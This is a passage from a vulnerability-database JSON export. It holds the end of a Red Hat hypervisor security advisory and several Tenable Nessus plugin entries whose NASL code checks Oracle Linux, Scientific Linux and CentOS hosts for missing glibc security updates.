Kernel-based Virtual Machine (KVM) hypervisor.\nIt includes everything necessary to run and manage virtual machines: A\nsubset of the Red Hat Enterprise Linux operating environment and the Red\nHat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nA divide-by-zero flaw was found in the Linux kernel's igmp_heard_query()\nfunction. An attacker able to send certain IGMP (Internet Group Management\nProtocol) packets to a target system could use this flaw to cause a denial\nof service. (CVE-2012-0207)\n\nA double free flaw was discovered in the policy checking code in OpenSSL.\nA remote attacker could use this flaw to crash an application that uses\nOpenSSL by providing an X.509 certificate that has specially-crafted\npolicy extension data. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029,\nand Simon McVittie for reporting CVE-2012-0207.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2006-1168 and CVE-2011-2716 (busybox issues)\n\nCVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc\nissues)\n\nCVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and\nCVE-2012-0028 (kernel issues)\n\nCVE-2011-1526 (krb5 issue)\n\nCVE-2011-4347 (kvm issue)\n\nCVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919\nand CVE-2011-1944 (libxml2 issues)\n\nCVE-2011-1749 (nfs-utils issue)\n\nCVE-2011-4108 (openssl issue)\n\nCVE-2011-0010 (sudo issue)\n\nCVE-2011-1675 and CVE-2011-1677 (util-linux issues)\n\nCVE-2010-0424 (vixie-cron issue)\n\nThis updated rhev-hypervisor5 package fixes various bugs. Documentation of\nthese changes will be available shortly in the Technical Notes document:\n\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "reporter": "RedHat", "published": "2012-02-21T05:00:00", "type": "redhat", "title": "(RHSA-2012:0168) Important: rhev-hypervisor5 security and bug fix update", "enchantments": {"score": {"modified": "2018-12-11T17:43:34", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-1168", "CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0424", "CVE-2010-0830", "CVE-2010-4008", "CVE-2011-0010", "CVE-2011-0216", "CVE-2011-1083", "CVE-2011-1089", "CVE-2011-1526", "CVE-2011-1675", "CVE-2011-1677", "CVE-2011-1749", "CVE-2011-1944", "CVE-2011-2716", "CVE-2011-2834", "CVE-2011-3638", "CVE-2011-3905", "CVE-2011-3919", "CVE-2011-4086", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4127", "CVE-2011-4347", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0028", "CVE-2012-0029", "CVE-2012-0207"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-25T06:35:47", "id": "RHSA-2012:0168", "href": "https://access.redhat.com/errata/RHSA-2012:0168", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:16:46", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-February/002608.html"], "pluginID": "68456", "description": "From Red Hat Security Advisory 2012:0126 :\n\nUpdated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 7, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : glibc (ELSA-2012-0126)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0126.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68456", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0126 and \n# Oracle Linux Security Advisory ELSA-2012-0126 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68456);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2012-0126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0126 :\n\nUpdated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002608.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:29", "references": ["http://www.nessus.org/u?b70164f6"], "pluginID": "61244", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 6, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-12-31T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120213_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61244", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61244);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2446\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b70164f6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:13:08", "references": ["http://www.nessus.org/u?e48699c2"], "pluginID": "57924", "description": "Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 9, "reporter": "Tenable", "published": "2012-02-14T00:00:00", "title": "CentOS 5 : glibc (CESA-2012:0126)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2012-0126.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57924", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126 and \n# CentOS Errata and Security Advisory 2012:0126 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57924);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2012:0126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e48699c2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 